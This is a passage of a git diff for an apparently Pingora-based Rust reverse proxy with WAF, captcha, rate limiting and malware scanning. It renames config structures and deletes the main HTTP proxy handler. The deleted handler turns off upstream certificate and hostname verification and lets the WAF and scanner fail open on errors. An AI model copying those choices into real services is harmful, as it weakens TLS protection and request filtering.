"/tmp/synapse-acme".to_string() } +fn default_acme_enabled() -> bool { + false +} +fn default_acme_port() -> u16 { + 9180 +} +fn default_acme_storage_path() -> String { + "/tmp/synapse-acme".to_string() +} -impl PingoraConfig { - /// Convert PingoraConfig to AppConfig for compatibility with old proxy system +impl ProxyConfig { + /// Convert ProxyConfig to AppConfig for compatibility with old proxy system pub fn to_app_config(&self) -> crate::utils::structs::AppConfig { let mut app_config = crate::utils::structs::AppConfig::default(); - app_config.proxy_address_http = self.proxy_address_http.clone(); - app_config.proxy_address_tls = self.proxy_address_tls.clone(); - app_config.proxy_certificates = self.proxy_certificates.clone(); - app_config.proxy_tls_grade = Some(self.proxy_tls_grade.clone()); + app_config.proxy_address_http = self.address_http.clone(); + app_config.proxy_address_tls = self.address_tls.clone(); + app_config.proxy_certificates = self.certificates.clone(); + app_config.proxy_tls_grade = Some(self.tls_grade.clone()); app_config.default_certificate = self.default_certificate.clone(); - app_config.upstreams_conf = self.upstreams_conf.clone(); - app_config.config_address = self.config_address.clone(); - app_config.config_api_enabled = self.config_api_enabled; - app_config.master_key = self.master_key.clone(); - app_config.healthcheck_method = self.healthcheck_method.clone(); - app_config.healthcheck_interval = self.healthcheck_interval; - app_config.proxy_protocol_enabled = self.proxy_protocol.enabled; - - // Parse config_address to local_server - if let Some((ip, port_str)) = self.config_address.split_once(':') { - if let Ok(port) = port_str.parse::() { - app_config.local_server = Some((ip.to_string(), port)); - } - } + app_config.upstreams_conf = self.upstream.conf.clone(); + app_config.healthcheck_method = self.upstream.healthcheck.method.clone(); + app_config.healthcheck_interval = self.upstream.healthcheck.interval; + app_config.proxy_protocol_enabled = self.protocol.enabled; // Parse proxy_address_tls to proxy_port_tls - if let Some(ref tls_addr) = self.proxy_address_tls { + if let Some(ref tls_addr) = self.address_tls { if let Some((_, port_str)) = tls_addr.split_once(':') { if let Ok(port) = port_str.parse::() { app_config.proxy_port_tls = Some(port); @@ -1036,8 +1783,8 @@ impl PingoraConfig { #[cfg(test)] mod tests { use super::*; - use std::env; use serial_test::serial; + use std::env; #[test] fn test_redis_ssl_config_deserialize() { @@ -1049,8 +1796,14 @@ insecure: true "#; let config: RedisSslConfig = serde_yaml::from_str(yaml).unwrap(); assert_eq!(config.ca_cert_path, Some("/path/to/ca.crt".to_string())); - assert_eq!(config.client_cert_path, Some("/path/to/client.crt".to_string())); - assert_eq!(config.client_key_path, Some("/path/to/client.key".to_string())); + assert_eq!( + config.client_cert_path, + Some("/path/to/client.crt".to_string()) + ); + assert_eq!( + config.client_key_path, + Some("/path/to/client.key".to_string()) + ); assert!(config.insecure); } @@ -1126,8 +1879,11 @@ prefix: "test:prefix" config.apply_env_overrides(); - assert!(config.redis.ssl.is_some()); - assert_eq!(config.redis.ssl.as_ref().unwrap().ca_cert_path, Some("/test/ca.crt".to_string())); + assert!(config.proxy.redis.ssl.is_some()); + assert_eq!( + config.proxy.redis.ssl.as_ref().unwrap().ca_cert_path, + Some("/test/ca.crt".to_string()) + ); unsafe { env::remove_var("AX_REDIS_SSL_CA_CERT_PATH"); @@ -1147,8 +1903,8 @@ prefix: "test:prefix" config.apply_env_overrides(); - assert!(config.redis.ssl.is_some()); - let ssl = config.redis.ssl.as_ref().unwrap(); + assert!(config.proxy.redis.ssl.is_some()); + let ssl = config.proxy.redis.ssl.as_ref().unwrap(); assert_eq!(ssl.client_cert_path, Some("/test/client.crt".to_string())); assert_eq!(ssl.client_key_path, Some("/test/client.key".to_string())); @@ -1170,8 +1926,8 @@ prefix: "test:prefix" config.apply_env_overrides(); - assert!(config.redis.ssl.is_some()); - assert!(config.redis.ssl.as_ref().unwrap().insecure); + assert!(config.proxy.redis.ssl.is_some()); + assert!(config.proxy.redis.ssl.as_ref().unwrap().insecure); unsafe { env::remove_var("AX_REDIS_SSL_INSECURE"); @@ -1190,8 +1946,8 @@ prefix: "test:prefix" config.apply_env_overrides(); - assert!(config.redis.ssl.is_some()); - assert!(!config.redis.ssl.as_ref().unwrap().insecure); + assert!(config.proxy.redis.ssl.is_some()); + assert!(!config.proxy.redis.ssl.as_ref().unwrap().insecure); unsafe { env::remove_var("AX_REDIS_SSL_INSECURE"); @@ -1212,8 +1968,8 @@ prefix: "test:prefix" config.apply_env_overrides(); - assert!(config.redis.ssl.is_some()); - let ssl = config.redis.ssl.as_ref().unwrap(); + assert!(config.proxy.redis.ssl.is_some()); + let ssl = config.proxy.redis.ssl.as_ref().unwrap(); assert_eq!(ssl.ca_cert_path, Some("/test/ca.crt".to_string())); assert_eq!(ssl.client_cert_path, Some("/test/client.crt".to_string())); assert_eq!(ssl.client_key_path, Some("/test/client.key".to_string())); diff --git a/src/core/mod.rs b/src/core/mod.rs new file mode 100644 index 0000000..e8cc92a --- /dev/null +++ b/src/core/mod.rs @@ -0,0 +1,2 @@ +pub mod app_state; +pub mod cli; diff --git a/src/http_proxy/proxyhttp.rs b/src/http_proxy/proxyhttp.rs deleted file mode 100644 index f2470a0..0000000 --- a/src/http_proxy/proxyhttp.rs +++ /dev/null @@ -1,1026 +0,0 @@ -use crate::utils::structs::{AppConfig, Extraparams, Headers, InnerMap, UpstreamsDashMap, UpstreamsIdMap}; -use crate::http_proxy::gethosts::GetHost; -use crate::waf::wirefilter::{evaluate_waf_for_pingora_request, WafAction}; -use crate::waf::actions::captcha::{validate_captcha_token, apply_captcha_challenge_with_token, generate_captcha_token}; -use arc_swap::ArcSwap; -use async_trait::async_trait; -use axum::body::Bytes; -use dashmap::DashMap; -use log::{debug, error, info, warn}; -use once_cell::sync::Lazy; -use pingora_http::{RequestHeader, ResponseHeader, StatusCode}; -use pingora_core::prelude::*; -use pingora_core::ErrorSource::{Upstream, Internal as ErrorSourceInternal}; -use pingora_core::{Error, ErrorType::HTTPStatus, RetryType, ImmutStr}; -use pingora_core::listeners::ALPN; -use pingora_core::prelude::HttpPeer; -use pingora_limits::rate::Rate; -use pingora_proxy::{ProxyHttp, Session}; -use serde_json; -use std::sync::Arc; -use std::sync::atomic::AtomicUsize; -use std::time::Duration; -use tokio::time::Instant; -use hyper::http; - -static RATE_LIMITER: Lazy = Lazy::new(|| Rate::new(Duration::from_secs(1))); -static WAF_RATE_LIMITERS: Lazy>> = Lazy::new(|| DashMap::new()); - -#[derive(Clone)] -pub struct LB { - pub ump_upst: Arc, - pub ump_full: Arc, - pub ump_byid: Arc, - pub arxignis_paths: Arc, AtomicUsize)>>, - pub headers: Arc, - pub config: Arc, - pub extraparams: Arc>, - pub tcp_fingerprint_collector: Option>, - pub certificates: Option>>>>, -} - -pub struct Context { - backend_id: String, - start_time: Instant, - upstream_start_time: Option, - hostname: Option, - upstream_peer: Option, - extraparams: arc_swap::Guard>, - tls_fingerprint: Option>, - request_body: Vec, - malware_detected: bool, - malware_response_sent: bool, - waf_result: Option, - threat_data: Option, - upstream_time: Option, - disable_access_log: bool, -} - -#[async_trait] -impl ProxyHttp for LB { - type CTX = Context; - fn new_ctx(&self) -> Self::CTX { - Context { - backend_id: String::new(), - start_time: Instant::now(), - upstream_start_time: None, - hostname: None, - upstream_peer: None, - extraparams: self.extraparams.load(), - tls_fingerprint: None, - request_body: Vec::new(), - malware_detected: false, - malware_response_sent: false, - waf_result: None, - threat_data: None, - upstream_time: None, - disable_access_log: false, - } - } - async fn request_filter(&self, session: &mut Session, _ctx: &mut Self::CTX) -> Result { - // Enable body buffering for content scanning - session.enable_retry_buffering(); - - let ep = _ctx.extraparams.clone(); - - // Userland access rules check (fallback when eBPF/XDP is not available) - // Check if IP is blocked by access rules - if let Some(peer_addr) = session.client_addr().and_then(|addr| addr.as_inet()) { - let client_ip: std::net::IpAddr = peer_addr.ip().into(); - - // Check if IP is blocked - if crate::access_rules::is_ip_blocked_by_access_rules(client_ip) { - log::info!("Userland access rules: Blocked request from IP: {} (matched block rule)", client_ip); - let mut header = ResponseHeader::build(403, None).unwrap(); - header.insert_header("X-Block-Reason", "access_rules").ok(); - session.set_keepalive(None); - session.write_response_header(Box::new(header), true).await?; - return Ok(true); - } - } - - // Try to get TLS fingerprint if available - // Use fallback lookup to handle PROXY protocol address mismatches - if _ctx.tls_fingerprint.is_none() { - if let Some(peer_addr) = session.client_addr().and_then(|addr| addr.as_inet()) { - let std_addr = std::net::SocketAddr::new(peer_addr.ip().into(), peer_addr.port()); - if let Some(fingerprint) = crate::utils::tls_client_hello::get_fingerprint_with_fallback(&std_addr) { - _ctx.tls_fingerprint = Some(fingerprint.clone()); - debug!( - "TLS Fingerprint retrieved for session - Peer: {}, JA4: {}, SNI: {:?}, ALPN: {:?}", - std_addr, - fingerprint.ja4, - fingerprint.sni, - fingerprint.alpn - ); - } else { - debug!("No TLS fingerprint found in storage for peer: {} (PROXY protocol may cause this)", std_addr); - } - } - } - - // Get threat intelligence data BEFORE WAF evaluation - // This ensures threat intelligence is available in access logs even when WAF blocks/challenges early - if let Some(peer_addr) = session.client_addr().and_then(|addr| addr.as_inet()) { - if _ctx.threat_data.is_none() { - match crate::threat::get_threat_intel(&peer_addr.ip().to_string()).await { - Ok(Some(threat_response)) => { - _ctx.threat_data = Some(threat_response); - debug!("Threat intelligence retrieved for IP: {}", peer_addr.ip()); - } - Ok(None) => { - debug!("No threat intelligence data for IP: {}", peer_addr.ip()); - } - Err(e) => { - debug!("Threat intelligence error for IP {}: {}", peer_addr.ip(), e); - } - } - } - } - - // Evaluate WAF rules - if let Some(peer_addr) = session.client_addr().and_then(|addr| addr.as_inet()) { - let socket_addr = std::net::SocketAddr::new(peer_addr.ip(), peer_addr.port()); - match evaluate_waf_for_pingora_request(session.req_header(), b"", socket_addr).await { - Ok(Some(waf_result)) => { - debug!("WAF rule matched: rule={}, id={}, action={:?}", waf_result.rule_name, waf_result.rule_id, waf_result.action); - - // Store threat response from WAF result if available (WAF already fetched it) - if let Some(threat_resp) = waf_result.threat_response.clone() { - _ctx.threat_data = Some(threat_resp); - debug!("Threat intelligence retrieved from WAF evaluation for IP: {}", peer_addr.ip()); - } - - // Store WAF result in context for access logging - _ctx.waf_result = Some(waf_result.clone()); - - match waf_result.action { - WafAction::Block => { - info!("WAF blocked request: rule={}, id={}, uri={}", waf_result.rule_name, waf_result.rule_id, session.req_header().uri); - let mut header = ResponseHeader::build(403, None).unwrap(); - header.insert_header("X-WAF-Rule", waf_result.rule_name).ok(); - header.insert_header("X-WAF-Rule-ID", waf_result.rule_id).ok(); - session.set_keepalive(None); - session.write_response_header(Box::new(header), true).await?; - return Ok(true); - } - WafAction::Challenge => { - info!("WAF challenge required: rule={}, id={}, uri={}", waf_result.rule_name, waf_result.rule_id, session.req_header().uri); - - // Check for captcha token in cookies or headers - let mut captcha_token: Option = None; - - // Check cookies for captcha_token - if let Some(cookies) = session.req_header().headers.get("cookie") { - if let Ok(cookie_str) = cookies.to_str() { - for cookie in cookie_str.split(';') { - let trimmed = cookie.trim(); - if let Some(value) = trimmed.strip_prefix("captcha_token=") { - captcha_token = Some(value.to_string()); - break; - } - } - } - } - - // Check X-Captcha-Token header if not found in cookies - if captcha_token.is_none() { - if let Some(token_header) = session.req_header().headers.get("x-captcha-token") { - if let Ok(token_str) = token_header.to_str() { - captcha_token = Some(token_str.to_string()); - } - } - } - - // Validate token if present - let token_valid = if let Some(token) = &captcha_token { - let user_agent = session.req_header().headers - .get("user-agent") - .and_then(|h| h.to_str().ok()) - .unwrap_or("") - .to_string(); - - match validate_captcha_token(token, &peer_addr.ip().to_string(), &user_agent).await { - Ok(valid) => { - if valid { - debug!("Captcha token validated successfully"); - } else { - debug!("Captcha token validation failed"); - } - valid - } - Err(e) => { - error!("Captcha token validation error: {}", e); - false - } - } - } else { - false - }; - - if !token_valid { - // Generate a new token (don't reuse invalid token) - let jwt_token = { - let user_agent = session.req_header().headers - .get("user-agent") - .and_then(|h| h.to_str().ok()) - .unwrap_or("") - .to_string(); - - match generate_captcha_token( - peer_addr.ip().to_string(), - user_agent, - None, // JA4 fingerprint not available here - ).await { - Ok(token) => token.token, - Err(e) => { - error!("Failed to generate captcha token: {}", e); - // Fallback to challenge without token - match apply_captcha_challenge_with_token("") { - Ok(html) => { - let mut header = ResponseHeader::build(403, None).unwrap(); - header.insert_header("Content-Type", "text/html; charset=utf-8").ok(); - session.set_keepalive(None); - session.write_response_header(Box::new(header), false).await?; - session.write_response_body(Some(Bytes::from(html)), true).await?; - return Ok(true); - } - Err(e) => { - error!("Failed to apply captcha challenge: {}", e); - // Block the request if captcha fails - let mut header = ResponseHeader::build(403, None).unwrap(); - header.insert_header("X-WAF-Rule", waf_result.rule_name).ok(); - header.insert_header("X-WAF-Rule-ID", waf_result.rule_id).ok(); - session.set_keepalive(None); - session.write_response_header(Box::new(header), true).await?; - return Ok(true); - } - } - } - } - }; - - // Return captcha challenge page - match apply_captcha_challenge_with_token(&jwt_token) { - Ok(html) => { - let mut header = ResponseHeader::build(403, None).unwrap(); - header.insert_header("Content-Type", "text/html; charset=utf-8").ok(); - header.insert_header("Set-Cookie", format!("captcha_token={}; Path=/; HttpOnly; SameSite=Lax", jwt_token)).ok(); - header.insert_header("X-WAF-Rule", waf_result.rule_name).ok(); - header.insert_header("X-WAF-Rule-ID", waf_result.rule_id).ok(); - session.set_keepalive(None); - session.write_response_header(Box::new(header), false).await?; - session.write_response_body(Some(Bytes::from(html)), true).await?; - return Ok(true); - } - Err(e) => { - error!("Failed to apply captcha challenge: {}", e); - // Block the request if captcha fails - let mut header = ResponseHeader::build(403, None).unwrap(); - header.insert_header("X-WAF-Rule", waf_result.rule_name).ok(); - header.insert_header("X-WAF-Rule-ID", waf_result.rule_id).ok(); - session.set_keepalive(None); - session.write_response_header(Box::new(header), true).await?; - return Ok(true); - } - } - } else { - // Token is valid, allow request to continue - debug!("Captcha token validated, allowing request"); - } - } - WafAction::RateLimit => { - // Get rate limit config from waf_result - if let Some(rate_limit_config) = &waf_result.rate_limit_config { - let period_secs = rate_limit_config.period_secs(); - let requests_limit = rate_limit_config.requests_count(); - - // Get or create rate limiter for this rule - let rate_limiter = WAF_RATE_LIMITERS - .entry(waf_result.rule_id.clone()) - .or_insert_with(|| { - debug!("Creating new rate limiter for rule {}: {} requests per {} seconds", - waf_result.rule_id, requests_limit, period_secs); - Arc::new(Rate::new(Duration::from_secs(period_secs))) - }) - .clone(); - - // Use client IP as the rate key - let rate_key = peer_addr.ip().to_string(); - let curr_window_requests = rate_limiter.observe(&rate_key, 1); - - if curr_window_requests > requests_limit as isize { - info!("Rate limit exceeded: rule={}, id={}, ip={}, requests={}/{}", - waf_result.rule_name, waf_result.rule_id, rate_key, curr_window_requests, requests_limit); - - let body = serde_json::json!({ - "error": "Too Many Requests", - "message": format!("Rate limit exceeded: {} requests per {} seconds", requests_limit, period_secs), - "rule": &waf_result.rule_name, - "rule_id": &waf_result.rule_id - }).to_string(); - - let mut header = ResponseHeader::build(429, None).unwrap(); - header.insert_header("X-Rate-Limit-Limit", requests_limit.to_string()).ok(); - header.insert_header("X-Rate-Limit-Remaining", "0").ok(); - header.insert_header("X-Rate-Limit-Reset", period_secs.to_string()).ok(); - header.insert_header("X-WAF-Rule", &waf_result.rule_name).ok(); - header.insert_header("X-WAF-Rule-ID", &waf_result.rule_id).ok(); - header.insert_header("Content-Type", "application/json").ok(); - - session.set_keepalive(None); - session.write_response_header(Box::new(header), false).await?; - session.write_response_body(Some(Bytes::from(body)), true).await?; - return Ok(true); - } else { - debug!("Rate limit check passed: rule={}, id={}, ip={}, requests={}/{}", - waf_result.rule_name, waf_result.rule_id, rate_key, curr_window_requests, requests_limit); - } - } else { - warn!("Rate limit action triggered but no config found for rule {}", waf_result.rule_id); - } - } - WafAction::Allow => { - debug!("WAF allowed request: rule={}, id={}", waf_result.rule_name, waf_result.rule_id); - // Allow the request to continue - } - } - } - Ok(None) => { - // No WAF rules matched, allow request to continue - debug!("WAF: No rules matched for uri={}", session.req_header().uri); - } - Err(e) => { - error!("WAF evaluation error: {}", e); - // On error, allow request to continue (fail open) - } - } - } else { - debug!("WAF: No peer address available for request"); - } - - let hostname = return_header_host(&session); - _ctx.hostname = hostname; - - let mut backend_id = None; - - if ep.sticky_sessions { - if let Some(cookies) = session.req_header().headers.get("cookie") { - if let Ok(cookie_str) = cookies.to_str() { - for cookie in cookie_str.split(';') { - let trimmed = cookie.trim(); - if let Some(value) = trimmed.strip_prefix("backend_id=") { - backend_id = Some(value); - break; - } - } - } - } - } - - match _ctx.hostname.as_ref() { - None => return Ok(false), - Some(host) => { - // let optioninnermap = self.get_host(host.as_str(), host.as_str(), backend_id); - let optioninnermap = self.get_host(host.as_str(), session.req_header().uri.path(), backend_id); - match optioninnermap { - None => return Ok(false), - Some(ref innermap) => { - // Check for HTTPS redirect before rate limiting - if ep.https_proxy_enabled.unwrap_or(false) || innermap.https_proxy_enabled { - if let Some(stream) = session.stream() { - if stream.get_ssl().is_none() { - // HTTP request - redirect to HTTPS - let uri = session.req_header().uri.path_and_query().map_or("/", |pq| pq.as_str()); - let port = self.config.proxy_port_tls.unwrap_or(403); - let redirect_url = format!("https://{}:{}{}", host, port, uri); - let mut redirect_response = ResponseHeader::build(StatusCode::MOVED_PERMANENTLY, None)?; - redirect_response.insert_header("Location", redirect_url)?; - redirect_response.insert_header("Content-Length", "0")?; - session.set_keepalive(None); - session.write_response_header(Box::new(redirect_response), false).await?; - return Ok(true); - } - } - } - if let Some(rate) = innermap.rate_limit.or(ep.rate_limit) { - // let rate_key = session.client_addr().and_then(|addr| addr.as_inet()).map(|inet| inet.ip().to_string()).unwrap_or_else(|| host.to_string()); - let rate_key = session.client_addr().and_then(|addr| addr.as_inet()).map(|inet| inet.ip()); - let curr_window_requests = RATE_LIMITER.observe(&rate_key, 1); - if curr_window_requests > rate { - let mut header = ResponseHeader::build(429, None).unwrap(); - header.insert_header("X-Rate-Limit-Limit", rate.to_string()).unwrap(); - header.insert_header("X-Rate-Limit-Remaining", "0").unwrap(); - header.insert_header("X-Rate-Limit-Reset", "1").unwrap(); - session.set_keepalive(None); - session.write_response_header(Box::new(header), true).await?; - debug!("Rate limited: {:?}, {}", rate_key, rate); - return Ok(true); - } - } - } - } - _ctx.upstream_peer = optioninnermap.clone(); - // Set disable_access_log flag from upstream config - if let Some(ref innermap) = optioninnermap { - _ctx.disable_access_log = innermap.disable_access_log; - } - } - } - Ok(false) - } - async fn upstream_peer(&self, session: &mut Session, ctx: &mut Self::CTX) -> Result> { - // Check if malware was detected, send JSON response and prevent forwarding - if ctx.malware_detected && !ctx.malware_response_sent { - // Check if response has already been written - if session.response_written().is_some() { - warn!("Response already written, cannot block malware request in upstream_peer"); - ctx.malware_response_sent = true; - return Err(Box::new(Error { - etype: HTTPStatus(403), - esource: Upstream, - retry: RetryType::Decided(false), - cause: None, - context: Option::from(ImmutStr::Static("Malware detected")), - })); - } - - info!("Blocking request due to malware detection"); - - // Build JSON response - let json_response = serde_json::json!({ - "success": false, - "error": "Request blocked", - "reason": "malware_detected", - "message": "Malware detected in request" - }); - let json_body = Bytes::from(json_response.to_string()); - - // Build response header - let mut header = ResponseHeader::build(403, None).unwrap(); - header.insert_header("Content-Type", "application/json").ok(); - header.insert_header("X-Content-Scan-Result", "malware_detected").ok(); - - session.set_keepalive(None); - - // Try to write response, handle error if response already sent - match session.write_response_header(Box::new(header), false).await { - Ok(_) => { - match session.write_response_body(Some(json_body), true).await { - Ok(_) => { - ctx.malware_response_sent = true; - } - Err(e) => { - warn!("Failed to write response body for malware block in upstream_peer: {}", e); - ctx.malware_response_sent = true; - } - } - } - Err(e) => { - warn!("Failed to write response header for malware block in upstream_peer: {}", e); - ctx.malware_response_sent = true; - } - } - - return Err(Box::new(Error { - etype: HTTPStatus(403), - esource: Upstream, - retry: RetryType::Decided(false), - cause: None, - context: Option::from(ImmutStr::Static("Malware detected")), - })); - } - - // let host_name = return_header_host(&session); - match ctx.hostname.as_ref() { - Some(_hostname) => { - match ctx.upstream_peer.as_ref() { - // Some((address, port, ssl, is_h2, https_proxy_enabled)) => { - Some(innermap) => { - let mut peer = Box::new(HttpPeer::new((innermap.address.clone(), innermap.port.clone()), innermap.ssl_enabled, String::new())); - // if session.is_http2() { - if innermap.http2_enabled { - peer.options.alpn = ALPN::H2; - } - if innermap.ssl_enabled { - // Use upstream server address for SNI, not the incoming hostname - // This ensures the SNI matches what the upstream server expects - peer.sni = innermap.address.clone(); - peer.options.verify_cert = false; - peer.options.verify_hostname = false; - } - - ctx.backend_id = format!("{}:{}:{}", innermap.address.clone(), innermap.port.clone(), innermap.ssl_enabled); - Ok(peer) - } - None => { - if let Err(e) = session.respond_error_with_body(502, Bytes::from("502 Bad Gateway\n")).await { - error!("Failed to send error response: {:?}", e); - } - Err(Box::new(Error { - etype: HTTPStatus(502), - esource: Upstream, - retry: RetryType::Decided(false), - cause: None, - context: Option::from(ImmutStr::Static("Upstream not found")), - })) - } - } - } - None => { - // session.respond_error_with_body(502, Bytes::from("502 Bad Gateway\n")).await.expect("Failed to send error"); - if let Err(e) = session.respond_error_with_body(502, Bytes::from("502 Bad Gateway\n")).await { - error!("Failed to send error response: {:?}", e); - } - Err(Box::new(Error { - etype: HTTPStatus(502), - esource: Upstream, - retry: RetryType::Decided(false), - cause: None, - context: None, - })) - } - } - } - - async fn upstream_request_filter(&self, _session: &mut Session, upstream_request: &mut RequestHeader, ctx: &mut Self::CTX) -> Result<()> { - // Track when we start upstream request - ctx.upstream_start_time = Some(Instant::now()); - - // Check if config has a Host header before setting default - let mut config_has_host = false; - if let Some(hostname) = ctx.hostname.as_ref() { - let path = _session.req_header().uri.path(); - if let Some(configured_headers) = self.get_header(hostname, path) { - for (key, _) in configured_headers.iter() { - if key.eq_ignore_ascii_case("Host") { - config_has_host = true; - break; - } - } - } - } - - // Only set default Host if config doesn't override it - if !config_has_host { - if let Some(hostname) = ctx.hostname.as_ref() { - upstream_request.insert_header("Host", hostname)?; - } - } - - if let Some(peer) = ctx.upstream_peer.as_ref() { - upstream_request.insert_header("X-Forwarded-For", peer.address.as_str())?; - } - - // Apply configured headers from upstreams.yaml (will override default Host if present) - if let Some(hostname) = ctx.hostname.as_ref() { - let path = _session.req_header().uri.path(); - if let Some(configured_headers) = self.get_header(hostname, path) { - for (key, value) in configured_headers { - // insert_header will override existing headers with the same name - let key_clone = key.clone(); - let value_clone = value.clone(); - if let Err(e) = upstream_request.insert_header(key_clone, value_clone) { - debug!("Failed to insert header {}: {}", key, e); - } - } - } - } - - Ok(()) - } - - - async fn request_body_filter(&self, _session: &mut Session, body: &mut Option, end_of_stream: bool, ctx: &mut Self::CTX) -> Result<()> - where - Self::CTX: Send + Sync, - { - // Accumulate request body for content scanning - // Copy the body data but don't take it - Pingora will forward it if no malware - if let Some(body_bytes) = body { - info!("BODY CHUNK received: {} bytes, total so far: {}, end_of_stream: {}", body_bytes.len(), ctx.request_body.len() + body_bytes.len(), end_of_stream); - ctx.request_body.extend_from_slice(body_bytes); - } - - if end_of_stream && !ctx.request_body.is_empty() { - if let Some(scanner) = crate::content_scanning::get_global_content_scanner() { - // Get peer address for scanning - let peer_addr = if let Some(addr) = _session.client_addr().and_then(|a| a.as_inet()) { - std::net::SocketAddr::new(addr.ip(), addr.port()) - } else { - return Ok(()); // Can't scan without peer address - }; - - // Convert request header to Parts for should_scan check - let req_header = _session.req_header(); - let method = req_header.method.as_str(); - let uri = req_header.uri.to_string(); - let mut req_builder = hyper::http::Request::builder() - .method(method) - .uri(&uri); - - // Copy essential headers for content scanning (content-type, content-length) - if let Some(content_type) = req_header.headers.get("content-type") { - if let Ok(ct_str) = content_type.to_str() { - req_builder = req_builder.header("content-type", ct_str); - } - } - if let Some(content_length) = req_header.headers.get("content-length") { - if let Ok(cl_str) = content_length.to_str() { - req_builder = req_builder.header("content-length", cl_str); - } - } - - let req = match req_builder.body(()) { - Ok(req) => req, - Err(_) => { - warn!("Failed to build request for content scanning, skipping scan"); - return Ok(()); - } - }; - let (req_parts, _) = req.into_parts(); - - // Check if we should scan this request - info!("Content scanner: checking if should scan - body size: {}, method: {}, content-type: {:?}", - ctx.request_body.len(), req_parts.method, req_parts.headers.get("content-type")); - let should_scan = scanner.should_scan(&req_parts, &ctx.request_body, peer_addr); - if should_scan { - info!("Content scanner: WILL SCAN request body (size: {} bytes)", ctx.request_body.len()); - - // Check if content-type is multipart and scan accordingly - let content_type = req_parts.headers - .get("content-type") - .and_then(|h| h.to_str().ok()); - - let scan_result = if let Some(ct) = content_type { - info!("Content-Type header: {}", ct); - if let Some(boundary) = crate::content_scanning::extract_multipart_boundary(ct) { - info!("Detected multipart content with boundary: '{}', scanning parts individually", boundary); - scanner.scan_multipart_content(&ctx.request_body, &boundary).await - } else { - info!("Not multipart or no boundary found, scanning as single blob"); - scanner.scan_content(&ctx.request_body).await - } - } else { - info!("No Content-Type header, scanning as single blob"); - scanner.scan_content(&ctx.request_body).await - }; - - match scan_result { - Ok(scan_result) => { - if scan_result.malware_detected { - info!("Malware detected in request from {}: {} {} - signature: {:?}", - peer_addr, method, uri, scan_result.signature); - - // Mark malware detected in context - ctx.malware_detected = true; - - // Send 403 response immediately to block the request - let json_response = serde_json::json!({ - "success": false, - "error": "Request blocked", - "reason": "malware_detected", - "message": "Malware detected in request" - }); - let json_body = Bytes::from(json_response.to_string()); - - let mut header = ResponseHeader::build(403, None)?; - header.insert_header("Content-Type", "application/json")?; - header.insert_header("X-Content-Scan-Result", "malware_detected")?; - - _session.set_keepalive(None); - _session.write_response_header(Box::new(header), false).await?; - _session.write_response_body(Some(json_body), true).await?; - - ctx.malware_response_sent = true; - - // Return error to abort the request - return Err(Box::new(Error { - etype: HTTPStatus(403), - esource: ErrorSourceInternal, - retry: RetryType::Decided(false), - cause: None, - context: Option::from(ImmutStr::Static("Malware detected")), - })); - } else { - debug!("Content scan completed: no malware detected"); - } - } - Err(e) => { - warn!("Content scanning failed: {}", e); - // On scanning error, allow the request to proceed (fail open) - } - } - } else { - debug!("Content scanner: skipping scan (should_scan returned false)"); - } - } - } - - Ok(()) - } - - async fn response_filter(&self, session: &mut Session, _upstream_response: &mut ResponseHeader, ctx: &mut Self::CTX) -> Result<()> { - // Calculate upstream response time - if let Some(upstream_start) = ctx.upstream_start_time { - ctx.upstream_time = Some(upstream_start.elapsed()); - } - - // _upstream_response.insert_header("X-Proxied-From", "Fooooooooooooooo").unwrap(); - if ctx.extraparams.sticky_sessions { - let backend_id = ctx.backend_id.clone(); - if let Some(bid) = self.ump_byid.get(&backend_id) { - let _ = _upstream_response.insert_header("set-cookie", format!("backend_id={}; Path=/; Max-Age=600; HttpOnly; SameSite=Lax", bid.address)); - } - } - match ctx.hostname.as_ref() { - Some(host) => { - let path = session.req_header().uri.path(); - let host_header = host; - let split_header = host_header.split_once(':'); - - match split_header { - Some(sh) => { - let yoyo = self.get_header(sh.0, path); - for k in yoyo.iter() { - for t in k.iter() { - _upstream_response.insert_header(t.0.clone(), t.1.clone()).unwrap(); - } - } - } - None => { - let yoyo = self.get_header(host_header, path); - for k in yoyo.iter() { - for t in k.iter() { - _upstream_response.insert_header(t.0.clone(), t.1.clone()).unwrap(); - } - } - } - } - } - None => {} - } - session.set_keepalive(Some(300)); - Ok(()) - } - - async fn logging(&self, session: &mut Session, _e: Option<&pingora_core::Error>, ctx: &mut Self::CTX) { - let response_code = session.response_written().map_or(0, |resp| resp.status.as_u16()); - - // Skip logging if disabled for this endpoint - if ctx.disable_access_log { - return; - } - - debug!("{}, response code: {response_code}", self.request_summary(session, ctx)); - - // Log TLS fingerprint if available - if let Some(ref fingerprint) = ctx.tls_fingerprint { - debug!( - "Request completed - JA4: {}, JA4_Raw: {}, TLS_Version: {}, Cipher: {:?}, SNI: {:?}, ALPN: {:?}, Response: {}", - fingerprint.ja4, - fingerprint.ja4_raw, - fingerprint.tls_version, - fingerprint.cipher_suite, - fingerprint.sni, - fingerprint.alpn, - response_code - ); - } - - let m = &crate::utils::metrics::MetricTypes { - method: session.req_header().method.to_string(), - code: session.response_written().map(|resp| resp.status.as_str().to_owned()).unwrap_or("0".to_string()), - latency: ctx.start_time.elapsed(), - version: session.req_header().version, - }; - crate::utils::metrics::calc_metrics(m); - - // Create access log - if let (Some(peer_addr), Some(local_addr)) = ( - session.client_addr().and_then(|addr| addr.as_inet()), - session.server_addr().and_then(|addr| addr.as_inet()) - ) { - let peer_socket_addr = std::net::SocketAddr::new(peer_addr.ip(), peer_addr.port()); - let local_socket_addr = std::net::SocketAddr::new(local_addr.ip(), local_addr.port()); - - // Convert request headers to hyper::http::request::Parts - let mut request_builder = http::Request::builder() - .method(session.req_header().method.as_str()) - .uri(session.req_header().uri.to_string()) - .version(session.req_header().version); - - // Copy headers - for (name, value) in session.req_header().headers.iter() { - request_builder = request_builder.header(name, value); - } - - let hyper_request = request_builder.body(()).unwrap(); - let (req_parts, _) = hyper_request.into_parts(); - - // Convert request body to Bytes - let req_body_bytes = bytes::Bytes::from(ctx.request_body.clone()); - - // Generate JA4H fingerprint from HTTP request - let ja4h_fingerprint = crate::ja4_plus::Ja4hFingerprint::from_http_request( - session.req_header().method.as_str(), - &format!("{:?}", session.req_header().version), - &session.req_header().headers - ); - - // Try to get TLS fingerprint from context or retrieve it again - // Priority: 1) Context, 2) Retrieve from storage, 3) None - let tls_fp_for_log = if let Some(tls_fp) = ctx.tls_fingerprint.as_ref() { - debug!("TLS fingerprint found in context - JA4: {}, JA4_unsorted: {}, SNI: {:?}, ALPN: {:?}", - tls_fp.ja4, tls_fp.ja4_unsorted, tls_fp.sni, tls_fp.alpn); - Some(tls_fp.clone()) - } else if let Some(peer_addr) = session.client_addr().and_then(|addr| addr.as_inet()) { - // Try to retrieve TLS fingerprint again if not in context - // Use fallback lookup to handle PROXY protocol address mismatches - let std_addr = 